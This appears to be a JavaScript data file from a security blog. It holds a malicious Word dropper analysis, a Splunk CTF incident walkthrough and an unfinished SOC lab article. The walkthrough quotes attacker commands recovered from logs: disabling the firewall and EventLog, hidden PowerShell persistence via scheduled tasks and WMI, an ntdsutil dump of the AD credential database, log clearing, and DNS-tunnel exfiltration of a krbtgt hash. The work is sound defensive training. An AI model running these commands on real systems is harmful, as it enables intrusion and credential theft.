  // Data Consolidation
        const articlesData = [
            { id: 1, type: 'writeup', title: 'Static Analysis of Malicious Word Document', tags: ['Malware Analysis', 'SecOps'], date: '2025-02-15', summary: 'Step-by-step guide to identify indicator of compromises within a malicious dropper file.',  content:`<div><div class="grid grid-cols-1 md:grid-cols-2 gap-6 mb-8"><div class="bg-gray-50 dark:bg-slate-800 p-6 rounded-xl border border-gray-200 dark:border-slate-700 shadow-sm"><div class="font-bold text-gray-900 dark:text-white mb-4 flex items-center gap-2"><i class="fa-solid fa-file-shield text-brand-500"></i> Malware Sample</div><ul class="space-y-3 text-sm text-gray-600 dark:text-gray-400 break-all"><li><strong class="text-gray-900 dark:text-gray-300">MD5:</strong> <br>ea50158bcef30d51e298846c056649c3</li><li><strong class="text-gray-900 dark:text-gray-300">SHA256:</strong> <br>d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee</li><li><strong class="text-gray-900 dark:text-gray-300">Download Source:</strong> <a href="https://bazaar.abuse.ch/sample/d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee/" target="_blank">Malware_Bazaar</a></li></ul></div><div class="bg-gray-50 dark:bg-slate-800 p-6 rounded-xl border border-gray-200 dark:border-slate-700 shadow-sm"><div class="font-bold text-gray-900 dark:text-white mb-4 flex items-center gap-2"><i class="fa-solid fa-toolbox text-brand-500"></i> Tools</div><ul class="space-y-3 text-sm text-gray-600 dark:text-gray-400"><li class="flex items-center gap-2"><div class="w-1.5 h-1.5 rounded-full bg-brand-500"></div> <strong class="text-gray-900 dark:text-gray-300">REMnux</strong> (Linux Toolkit)</li><li class="flex items-center gap-2"><div class="w-1.5 h-1.5 rounded-full bg-brand-500"></div> <strong class="text-gray-900 dark:text-gray-300">Oletools</strong></li><li class="flex items-center gap-2"><div class="w-1.5 h-1.5 rounded-full bg-brand-500"></div> <strong class="text-gray-900 dark:text-gray-300">CyberChef</strong></li></ul></div></div><h2 class="text-2xl sm:text-3xl font-bold text-gray-900 dark:text-white mb-6">Getting Started with Static Analysis of Malicious Doc File</h2><p class="leading-relaxed mb-4 text-base">Download the malware sample from the link provided above. You would get a password protected zip file which can be extracted using 7-zip or other similar tools using “infected” as password. It is good to move forward by renaming the document from its original name (SHA256 derived) to make it easier for us to refer to the file later on.</p><div class="mt-8 mb-8 p-5 rounded-xl bg-red-50 dark:bg-red-900/20 border border-red-200 dark:border-red-800/40 flex items-start gap-4"><i class="fa-solid fa-triangle-exclamation text-red-600 dark:text-red-500 text-xl mt-1"></i><div><div class="font-bold text-base text-red-900 dark:text-red-200 mb-1.5">Note:</div><p class="text-sm text-red-800 dark:text-red-300 leading-relaxed">This is a real malware. So, make sure not to enable macros while analyzing it using Microsoft Word application before making changes to the functions and sub-routines.</p></div></div></div><div><h2 class="text-2xl font-bold text-gray-900 dark:text-white mb-6">Step 1: Determine file type</h2><p class="leading-relaxed mb-6">First of all, we have to determine if the file we are dealing with is the Word document or not. There are multiple ways to achieve that using commands like “file”, “exiftool”, “trid”, etc. Here, after executing the "file" command in the file, we can see that it is a “Composite Document File V2 Document”, which is Microsoft's OLE2 file type. Object Linking and Embedding (OLE2) allows different applications to share and manipulate data within a document. This file type is commonly generated by MS Office documents and Outlook messages.</p><img src="./img/01.png" alt="File Type Command Output" class="w-full h-auto rounded-xl border border-gray-200 dark:border-slate-700 shadow-sm my-8"><p class="leading-relaxed mb-6">Since, we have found out that this is a malicious word document, we can use oletools for analysis moving forward. We can use “oleid” command to determine peculiar characteristics of this malicious document. We see that this document contains VBA macros which are the common targets for attackers to embed automatically executable malicious code.</p><img src="./img/02.png" alt="Oleid Command Output" class="w-full h-auto rounded-xl border border-gray-200 dark:border-slate-700 shadow-sm my-8"></div><div><h2 class="text-2xl font-bold text-gray-900 dark:text-white mb-6">Step 2: Grab more Information using “olevba”</h2><p class="leading-relaxed mb-6">We can use “olevba” to detect VBA macros, extract their source code, and identify security patterns like auto-executable macros, suspicious malware keywords, anti-sandboxing techniques, and potential IOCs (IPs, URLs, executables). It also decodes common obfuscation methods such as Hex encoding, StrReverse and Base64, extracting IOCs from decoded strings. Not all information resulted by olevba is correct, but it does provide some helpful information regarding where to look for and what to look for in the malicious document.</p><p class="leading-relaxed mb-6">In our file, we can see an auto executable sub_routine “Document_open” that runs when the file is opened. It also consists of multiple suspicious functions like “Create”, “showwindow” and “CreateObject”. Further, It entails us about the presence of base64 strings and hex strings that needs to be decoded for generating meaningful strings.</p><img src="./img/03.png" alt="Olevba Output" class="w-full h-auto rounded-xl border border-gray-200 dark:border-slate-700 shadow-sm my-8"></div><div><h2 class="text-2xl font-bold text-gray-900 dark:text-white mb-6">Step 3: Extract High value streams from the document</h2><p class="leading-relaxed mb-6">These OLE2 documents contains multiple streams of data within them. We can use "oledump.py" command to view all the streams present in the document. The high value streams that interest us most are macros, objects and streams with huge sizes. These are the places where we could potentially find the indicator of compromises (IOCs) that the attacker has placed.</p><p class="leading-relaxed mb-6">In our file, we could see 3 macros, where one of them “roubhaol” which seems to be a form-object indicated by presence of 'f' followed by 'o' as we can see below in stream 19 and 36. All the other streams within this form-objects are elements of that form-object. The stream 34 also seems to be of high value due to its large file size compared to other streams within the form-object. We will come back to it later. So, for now we can extract macro streams from the file to analyze them easily with the VS code application. Here, I have prepared a shell "dump.sh" that extracts all macros and objects from the OLE2 file. You can find the link to it <a href="https://github.com/crew2057/shell_mz-dump/tree/main" target="_blank">here</a>.</p><img src="./img/04.png" alt="Olevba Output" class="w-full h-auto rounded-xl border border-gray-200 dark:border-slate-700 shadow-sm my-8"></div><div><h2 class="text-2xl font-bold text-gray-900 dark:text-white mb-6">Step 4: Perform Deobfuscation of High Value Streams</h2><p class="leading-relaxed mb-6">Now, we can analyze each of the macro streams and perform required deobfuscation techniques like pattern recognition and decoding to derive meaningful code that could provide us hint towards IOCs. We always start with the stream that contains the 'AutoExec' subroutine and follow through while analyzing them. It seems that this document at hand is highly obfuscated, so we could open it in FLARE to substitute the properties of form-objects and derive the clean readable code. Or, In this case we do have an additional high value stream 'stream 34' which we could analyze using strings command to see if there are any suspicious strings.</p><p class="leading-relaxed mb-6">While running “Strings” command on the file after extracting it, we can see that there is a string with certain repeated pattern of characters ending with '='. This does seem like a base64 code. We can pass that string to “CyberChef” for further analysis.</p><img src="./img/05.png" alt="Obfuscated Base64 String" class="w-full h-auto rounded-xl border border-gray-200 dark:border-slate-700 shadow-sm my-8"><p class="leading-relaxed mb-6">After just removing the repeated pattern from the string, we can see some useful information. It seems that the attacker was trying to execute base64 command in Powershell.</p><img src="./img/06.png" alt="CyberChef Deobfuscation Output" class="w-full h-auto rounded-xl border border-gray-200 dark:border-slate-700 shadow-sm my-8"></div><div><h2 class="text-2xl font-bold text-gray-900 dark:text-white mb-6">Step 5: Determine Indicators of Compromise</h2><p class="leading-relaxed mb-6">Decoding the base64 string provides us with some valuable information as can be seen in image below. It looks like the attacker intended to download files into user's profile directory from some suspicious URLs and execute them using WMI. While further analyzing these URLs in VirusTotal and Any.Run, these URLs are marked as malicious.</p><img src="./img/07.png" alt="VirusTotal URLs" class="w-full h-auto rounded-xl border border-gray-200 dark:border-slate-700 shadow-sm my-8"></div><div><h2 class="text-2xl font-bold text-gray-900 dark:text-white mb-6">Conclusion</h2><p class="leading-relaxed mb-4">We were able to determine the multiple indicators of compromises (IOCs) in this malicious document after performing static analysis using Oletools. By looking at the IOCs, we conclude that this document is a 'Dropper' that downloads the malicious files and executes them in the system.</p><p class="leading-relaxed mb-4">This is not the only path to conduct the static analysis, you could use different tools and methods to reach to the similar conclusion.</p><p class="font-bold text-brand-500 dark:text-brand-400 mt-6 text-lg">Keep exploring and Keep learning!</p></div>` },



            { id: 2, type: 'writeup', title: 'MyDFIR CTF Challenge 1', tags: ['Log Analysis', 'SecOps', 'Splunk'], date: '2026-05-19', summary: 'Walkthrough on CTF challenge conducted in MyDFIR community',  content:`<div><div class="mb-8 bg-gray-50 dark:bg-slate-800 p-6 rounded-xl border border-gray-200 dark:border-slate-700 shadow-sm"><div class="text-gray-900 dark:text-white flex items-center gap-2"><i class="fa-solid fa-file-lines text-brand-500"></i><span class="font-bold">Sample File:</span><a href="./resources/mydfir_forge.spl" download>Download link</a></div></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">1. Identify the Attacker IP</strong> Someone gained unauthorized access to MTS-ContractorPC1 via RDP. What is the attacker's IP address?</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">index="mydfir-forge" EventID=4624 LogonType=10</code><p class="leading-relaxed mb-6">This resulted in two account logon activities. From src_ip:81.141.200.165 to “Administrator” account and from src_ip: 142.90.213.242 to “Contractor” account. After looking at the logon events form each src_ip, we can see that there are multiple sign-in failure to administrator account before successful sign-on. So, the attacker's logon to administrator account at 10/7/25 4:13:10 AM with IP <strong class="text-gray-900 dark:text-white">81.141.200.165</strong>.</p></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">2. Compromised Account</strong> What was the account name that the attacker used to successfully log onto MTS-ContractorPC1?</p><ul class="list-disc pl-6 mb-6 space-y-2"><li><strong class="text-gray-900 dark:text-white">administrator</strong></li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">3. Abused Built-In Windows Tool</strong> On MTS-ContractorPC1, the attacker leveraged a built-in Windows executable to covertly download a malicious file from the internet. This is known as a Living Off the Land Binary (LOLBin). Which native Windows executable did the attacker abuse to download a file? Reference: https://www.secuinfra.com/en/glossary/lolbas-lolbins/</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">index="mydfir-forge" DeviceName="mts-contractorpc1" process_name="powershell.exe" "*http*"</code><ul class="list-disc pl-6 mb-6 space-y-2"><li>At 10/7/25 4:18:54 AM, powershell was used to download the malicious file from url http[://]78.141.234.86:1337/kb5029244[.]ps1. So, the answer is <strong class="text-gray-900 dark:text-white">powershell.exe</strong>.</li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">4. Domain of Interest</strong> What is the domain/IP of the attacker's command and control server?</p><ul class="list-disc pl-6 mb-6 space-y-2"><li><strong class="text-gray-900 dark:text-white">78.141.234.86</strong></li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">5. Suspicious Script Downloaded</strong> What script was downloaded from the attacker's command and control server using the built-in Windows tool you identified</p><ul class="list-disc pl-6 mb-6 space-y-2"><li><strong class="text-gray-900 dark:text-white">kb5029244.ps1</strong></li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">6. System Discovery Command</strong> Attackers often run small commands to learn about a computer before doing anything else. That step is called discovery. Find the discovery command the attacker executed on MTS-ContractorPC1 to obtain information about the system. Reference: https://car.mitre.org/analytics/CAR-2016-03-001</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">Query:<br>index="mydfir-forge" DeviceName="mts-contractorpc1" process_name IN ("hostname.exe","ipconfig.exe","net.exe","quser.exe","qwinsta.exe","systeminfo.exe","tasklist.exe","dsquery.exe","whoami.exe") | dedup process_name | table process_name<br><br>Result:<br>net.exe<br>tasklist.exe<br>ipconfig.exe<br>systeminfo.exe<br>HOSTNAME.exe<br>whoami.exe</code></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">7. Find the Persistence</strong> The attacker made changes to the registry on MTS-ContractorPC1 to maintain a LOLBIN process you identified earlier. What is the registry value name that was modified? Reference: https://tech-zealots.com/malware-analysis/malware-persistence-mechanisms/</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">index="mydfir-forge" DeviceName="mts-contractorpc1" "*RegistryValueSet*" registry_value_data="*powershell.exe*"</code><ul class="list-disc pl-6 mb-6 space-y-2"><li><strong class="text-gray-900 dark:text-white">OneDriveStandalone</strong></li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">8. Microsoft Defender Exclusion</strong> Microsoft Defender normally scans files, folders and processes to stop malware. How many unique processes were excluded from Defender?</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">index="mydfir-forge" DeviceName="mts-contractorpc1" RegistryKey="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes" | dedup registry_value_name | stats count</code><ul class="list-disc pl-6 mb-6 space-y-2"><li>8</li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">9. Dumped Credentials</strong> The attacker ran a program that tried to read sensitive information from the computer's memory (this is how attackers can capture account passwords or hashes). What is the exact filename of the program that accessed system memory to steal credentials on MTS-ContractorPC1?</p><ul class="list-disc pl-6 mb-6 space-y-2"><li>From previous query, we found out <strong class="text-gray-900 dark:text-white">mimikatz.exe</strong> was also excluded from Defender. This tool is generally used by attackers for credential harvesting. Querying for this file, we can see that it was executed at around 10/7/25 6:27:28 AM.</li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">10. Additional Asset Compromised</strong> After the attacker obtained credentials, they accessed another asset. What is the name of that asset?</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">index="mydfir-forge" DeviceName!="mts-contractorpc1" ActionType="LogonSuccess"</code><ul class="list-disc pl-6 mb-6 space-y-2"><li><strong class="text-gray-900 dark:text-white">mts-dc.mts.local</strong></li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">11. Sensitive Documents Viewed</strong> After moving laterally, the attacker opened sensitive company files. What is the filename of the <strong class="text-gray-900 dark:text-white">last</strong> file they opened?</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">index="mydfir-forge" DeviceName="mts-dc.mts.local" ActionType="SensitiveFileRead" | table _time,FileName</code><ul class="list-disc pl-6 mb-6 space-y-2"><li>The first sensitive file “2024_Client_Returns.xlsx” was read at 10/07/25 7:17:52 AM and the last sensitive file “<strong class="text-gray-900 dark:text-white">Q4_Financial_Report.xlsx</strong>” was read at 10/07/25 8:00:43 AM.</li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">12. Archive Used for Exfiltration</strong> The attacker bundled several documents into a single archive (.zip, .rar, etc.). What is the full file path including the name of that archive file?</p><ul class="list-disc pl-6 mb-4 space-y-2"><li>After querying for “*archive*” we get “backup.zip” as one of the archive file. Further query on that file gives us the full path “C:\ProgramData\Microsoft\Crypto\RSA\<strong class="text-gray-900 dark:text-white">backup.zip</strong>”. This archive was created at 10/07/25 8:10:59 AM.</li></ul><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-6 overflow-x-auto text-gray-800 dark:text-gray-300">index="mydfir-forge" DeviceName="mts-dc.mts.local" "*backup.zip*"</code></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">13. Cloud Service for Exfiltration</strong> After archiving the files, the attacker didn't keep them on the local machine. They uploaded the stolen data to a cloud storage service. Which cloud service did the attacker use?</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">index="mydfir-forge" DeviceName="mts-dc.mts.local" "*http*" "*POST*"</code><ul class="list-disc pl-6 mb-6 space-y-2"><li>At 10/7/25 8:11:00 AM, attacker uploaded the archived file to <strong class="text-gray-900 dark:text-white">https[://]file[.]io.</strong></li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">14. Silent Sabotage</strong> The attacker tampered with Windows Defender by changing registry settings. They modified multiple registry values to disable different protection features. How many distinct registry value names were modified by the attacker in the <strong class="text-gray-900 dark:text-white">policy-controlled</strong> Windows Defender registry keys?</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">Query:<br>index="mydfir-forge" "*Policies*Windows Defender*" ActionType="RegistryValueSet" | dedup registry_value_name | table _time registry_value_name<br><br>Result:<br>DisableIOAVProtection<br>DisableBehaviorMonitoring<br>DisableAntiVirus<br>DisableAntiSpyware</code><ul class="list-disc pl-6 mb-6 space-y-2"><li><strong class="text-gray-900 dark:text-white">4</strong></li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">15. Breaking Down the Walls</strong> After disabling Defender, the attacker turned off another critical security control using a built-in Windows command-line tool, disabling protection across all profiles at once. Find the exact command-line (including the extension) the attacker used to disable the Windows Firewall.</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-6 overflow-x-auto text-gray-800 dark:text-gray-300">Query:<br>index="mydfir-forge" process_name="cmd.exe"<br><br>Result: 10/7/25 7:30:14 AM<br>"cmd.exe" /c "netsh.exe advfirewall set allprofiles state off"</code></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">16. Covering Their Tracks</strong> The attacker tried to stop a critical Windows service that records system activity, attempting to blind security monitoring. Identify the exact name of the service the attacker tried to stop.</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">Query:<br>index="mydfir-forge" process_name="powershell.exe" OR process_name="cmd.exe" "*Stop-service*"<br><br>Result:<br>"Stop-Service -Name \"EventLog\" -Force -ErrorAction SilentlyContinue"</code><ul class="list-disc pl-6 mb-6 space-y-2"><li>The name of the service is <strong class="text-gray-900 dark:text-white">EventLog</strong>.</li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">17. Hidden in Plain Sight</strong> The attacker established C2 communication by downloading a malicious payload from an external server on a non-standard port. To avoid detection by network monitoring tools, they disguised their HTTP traffic using a User-Agent string that mimics legitimate Windows system activity. Identify the exact User-Agent string.</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">index="mydfir-forge" dest_port!=80 AND dest_port!=443 "*user_agent*"</code><ul class="list-disc pl-6 mb-6 space-y-2"><li><strong class="text-gray-900 dark:text-white">user-agent:"Microsoft-CryptoAPI/10.0"</strong></li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">18. The Staging Ground</strong> The attacker used a specific folder path on MTS-ContractorPC1 as their staging area. What is the folder path?</p><ul class="list-disc pl-6 mb-4 space-y-2"><li>After inspecting for defender antivirus passive mode records, we could determine the folder used as staging area by the attacker.</li></ul><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-6 overflow-x-auto text-gray-800 dark:text-gray-300">Query:<br>index="mydfir-forge" DeviceName="mts-contractorpc1"  ActionType=AntivirusDetectionActionType | spath input=AdditionalFields | search ReportSource="Windows Defender Antivirus passive mode" | dedup FolderPath<br><br>Result:<br>C:\Users\Public</code></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">19. Persistence in Disguise</strong> The attacker created two scheduled tasks on MTS-ContractorPC1 that masquerade as legitimate services but actually execute a LOLBIN process you identified earlier. Identify the names of <strong class="text-gray-900 dark:text-white">BOTH</strong> scheduled tasks the attacker created for persistence.</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">Query:<br>index="mydfir-forge" DeviceName="mts-contractorpc1"  process_name="schtasks.exe" | dedup ProcessCommandLine<br><br>Result:<br>"schtasks.exe" /create /tn MicrosoftEdgeUpdateTaskMachineUA /tr "powershell.exe -NoP -W Hidden -c Start-Process 'C:\Users\Public\MicrosoftEdgeUpdate.exe'" /sc minute /mo 5 /ru SYSTEM /f<br>"schtasks.exe" /create /tn GoogleUpdateTaskMachineCore /tr "powershell.exe -NoP -W Hidden -c Start-Process 'C:\Users\Public\MicrosoftEdgeUpdate.exe'" /sc onlogon /ru SYSTEM /f</code><ul class="list-disc pl-6 mb-6 space-y-2"><li>So, the name of two processes are : <strong class="text-gray-900 dark:text-white">MicrosoftEdgeUpdateTaskMachineUA</strong> and <strong class="text-gray-900 dark:text-white">GoogleUpdateTaskMachineCore</strong></li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">20. The Silent Watcher</strong> The attacker deployed an additional persistence mechanism on MTS-ContractorPC1 that executes malicious PowerShell every 5 minutes to beacon back to their C2. This method is more covert than common persistence and triggers based on system events. Find the <strong class="text-gray-900 dark:text-white">consumer</strong> name of this persistence mechanism.</p><ul class="list-disc pl-6 mb-4 space-y-2"><li>We can see that one of the processes above <strong class="text-gray-900 dark:text-white">MicrosoftEdgeUpdateTaskMachineUA</strong> is scheduled to execute powershell command every 5 minutes. This program executes “C:\Users\Public\MicrosoftEdgeUpdate.exe”.</li></ul><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">Query:<br>index="mydfir-forge" DeviceName="mts-contractorpc1" ActionType="WmiBindEventFilterToConsumer"<br><br>Result:<br>{"Consumer":"CommandLineEventConsumer=\"WindowsSystemHealthConsumer\"","Ess":"SystemPerformanceMonitor","Namespace":"//./root/subscription","PossibleCause":"Binding EventFilter: <br>instance of __EventFilter<br>{<br>\tCreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 120, 189, 6, 162, 98, 223, 103, 91, 9, 169, 246, 47, 232, 3, 0, 0};<br>\tEventNamespace = \"root\\\\cimv2\";<br>\tName = \"SystemPerformanceMonitor\";<br>\tQuery = \"SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\";<br>\tQueryLanguage = \"WQL\";<br>};<br>Perm. Consumer: <br>instance of CommandLineEventConsumer<br>{<br>\tCommandLineTemplate = \"powershell.exe -NoP -W Hidden -c Start-Process 'C:\\\\Users\\\\Public\\\\MicrosoftEdgeUpdate.exe'\";<br>\tCreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 120, 189, 6, 162, 98, 223, 103, 91, 9, 169, 246, 47, 232, 3, 0, 0};<br>\tName = \"WindowsSystemHealthConsumer\";<br>};<br>"}</code><ul class="list-disc pl-6 mb-6 space-y-2"><li>So, the consumer name is <strong class="text-gray-900 dark:text-white">WindowsSystemhealthConsumer</strong>.</li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">21. The Extraction Point</strong> After logging into the Domain Controller, the attacker chose a specific directory to stage their tools and prepare for the next phase. What is the full directory path where the attacker staged their tools/files on the Domain Controller?</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-6 overflow-x-auto text-gray-800 dark:text-gray-300">Query:<br>index="mydfir-forge" DeviceName="mts-dc.mts.local" ActionType="FileCreated" "*Active Directory*"<br><br>Result:<br>"C:\temp\Active Directory\"</code></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">22. Shadow Operations</strong> The attacker executed a command on the Domain Controller that <strong class="text-gray-900 dark:text-white">created</strong> a snapshot of critical system data, a technique commonly used to access locked files and extract sensitive information while the system remains operational. What executable did the attacker use?</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">Query:<br>index="mydfir-forge" DeviceName="mts-dc.mts.local" ActionType="FileCreated" "*ntds*"<br><br>Result:<br>ntdsutil.exe "ac i ntds" "ifm" "create full c:\temp" q q</code><ul class="list-disc pl-6 mb-6 space-y-2"><li><strong class="text-gray-900 dark:text-white">ntdsutil.exe</strong></li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">23. The Crown Jewels</strong> The attacker extracted a critical database file from the Domain Controller that contains highly sensitive credential information for the entire Active Directory environment. What is the <strong class="text-gray-900 dark:text-white">exact</strong> command the attacker used?</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-6 overflow-x-auto text-gray-800 dark:text-gray-300">Query:<br>index="mydfir-forge" DeviceName="mts-dc.mts.local" ActionType="FileCreated" "*ntds*"<br><br>Result:<br>"ntdsutil.exe "ac i ntds" "ifm" "create full c:\temp" q q"</code></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">24. Erasing the Trail</strong> The attacker attempted to cover their tracks by removing forensic evidence from the Domain Controller. They systematically wiped multiple logs that would have recorded their activities. List the 3 event log names the attacker cleared.</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300">index="mydfir-forge" DeviceName="mts-dc.mts.local" "*wevtutil*"</code><ul class="list-disc pl-6 mb-6 space-y-2"><li>Application, System, Security</li></ul></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">25. Command History Vanished</strong> As a final cleanup step, the attacker removed a file that stores a record of all PowerShell commands executed in previous sessions, eliminating evidence of their interactive activities on the Domain Controller. What is the full file path including the file name and extension?</p><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-6 overflow-x-auto text-gray-800 dark:text-gray-300">Query:<br>index="mydfir-forge" DeviceName="mts-dc.mts.local" ActionType="FileDeleted" "*history*"<br><br>Result:<br>C:\Users\administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code></div><div><p class="leading-relaxed mb-4"><strong class="text-gray-900 dark:text-white">26. The Encoded Escape</strong> The attacker used an unconventional method to exfiltrate credentials from the compromised environment. What account and hash combination was transmitted during this operation?</p><ul class="list-disc pl-6 mb-4 space-y-2"><li>Filtering the timeframe between the execution of the malware and clearance of history, we could look for the processCommandLine executed for the mts-dc.mts.local. We could see that one process stands out where nslookup is used to query suspicious domain_name in google dns server. While cracking the base64, we get <strong class="text-gray-900 dark:text-white">krbtgt:4b4dce8eff48a3d.</strong> So, the attacker is likely using dns tunneling to exfiltrate data.</li></ul><code class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-6 overflow-x-auto text-gray-800 dark:text-gray-300">Query:<br>index="mydfir-forge" DeviceName="mts-dc.mts.local" | dedup ProcessCommandLine<br><br>Result:<br>nslookup.exe a3JidGd0OjRiNGRjZThlZmY0OGEzZD.data.microsoft.com 8.8.8.8</code></div></div>`},
            
            
            
            { id: 3, type: 'project', title: 'SOC Lab Setup', tags: ['Elastic','SecOps'], date: '2026-03-29', summary: 'Building the Home Lab to simulate real-word SOC workflow.',  content:`<div><h2 class="text-2xl sm:text-3xl font-bold text-gray-900 dark:text-white mb-6">Introduction</h2><p class="leading-relaxed mb-6 text-base">Security Operations Centers (SOCs) play a critical role in monitoring systems, detecting threats, investigating security incidents, and coordinating appropriate responses. To gain practical experience with these activities, I built a cloud-based SOC lab environment that simulated attacks against Windows and Linux systems.</p><p class="leading-relaxed mb-8 text-base">The lab focused on three key areas: establishing a centralized security monitoring infrastructure, detecting and responding to brute-force attacks, and investigating a simulated Command and Control (C2) operation. Throughout the exercises, I used Elastic SIEM, endpoint telemetry, automated alerting, and ticket-based incident response to replicate key SOC workflows.</p><div class="text-xl font-bold text-gray-900 dark:text-white mb-4">Tools and Technologies</div><ul class="list-none space-y-3 mb-6"><li><strong class="text-gray-900 dark:text-gray-200">Elastic SIEM and Kibana:</strong> Centralized log collection, security monitoring, and analysis.</li><li><strong class="text-gray-900 dark:text-gray-200">Sysmon:</strong> Detailed Windows endpoint telemetry for security investigations.</li><li><strong class="text-gray-900 dark:text-gray-200">Elastic Defend:</strong> Endpoint protection and automated remediation actions.</li><li><strong class="text-gray-900 dark:text-gray-200">Mythic:</strong> C2 simulation and controlled data-exfiltration testing.</li><li><strong class="text-gray-900 dark:text-gray-200">osTicket:</strong> Incident ticketing and alert management.</li><li><strong class="text-gray-900 dark:text-gray-200">Hydra:</strong> Brute-force attack simulation against SSH and RDP services.</li><li><strong class="text-gray-900 dark:text-gray-200">XAMPP and MySQL:</strong> Hosting and database infrastructure for osTicket.</li></ul></div><div><h2 class="text-2xl sm:text-3xl font-bold text-gray-900 dark:text-white mb-6">SOC Lab Environment Setup</h2><div class="font-bold text-lg text-gray-900 dark:text-white mb-2">Objective</div><p class="leading-relaxed mb-6">The goal was to build a functional SOC environment capable of collecting security logs from Windows and Linux endpoints, detecting simulated attacks, generating incident tickets, and performing automated remediation.</p><div class="font-bold text-lg text-gray-900 dark:text-white mb-2 